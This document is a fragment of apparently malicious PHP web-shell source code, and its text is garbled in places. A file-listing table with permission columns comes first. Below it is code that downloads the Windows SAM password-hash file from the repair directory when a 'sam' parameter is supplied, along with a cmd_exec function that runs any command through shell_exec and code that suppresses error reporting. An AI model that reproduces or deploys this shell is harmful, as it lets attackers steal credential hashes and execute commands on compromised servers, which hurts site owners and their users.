z`
| Items | Size | Permission | Action |
|---|---|---|---|
| $folders"; ?> | --- | ".hi_permission($path."/".$folders).""; ?> | "; ?> |
| $files"; ?> | ".hi_permission($path."/".$folders).""; ?> | "; ?> |
'; echo $footer; exit;} if($_REQUEST['sam']) { function send_file($name) { $status = FALSE; $path = $_SERVER["WINDIR"]."\\repair\\".$name; if (!is_file($path) or connection_status()!=0) return(FALSE); header("Content-type: application/octet-stream"); header("Content-Disposition: inline; filename=\"".$name."\""); header("Content-length: ".(string)(filesize($path))); header("Expires: ".gmdate("D, d M Y H:i:s", mktime(date("H")+2, date("i"), date("s"), date("m"), date("d"), date("Y")))." GMT"); header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); header("Cache-Control: no-cache, must-revalidate"); header("Pragma: no-cache"); if ($file = fopen($path, 'rb')) { while(!feof($file) and (connection_status()==0)) { print(fread($file, 1024*8)); flush(); } $status = (connection_status()==0); fclose($file); } return($status); } send_file("sam") ; } ERROR_REPORTING(0); function cmd_exec($cmd) { $result = shell_exec($cmd); return $result; } ?>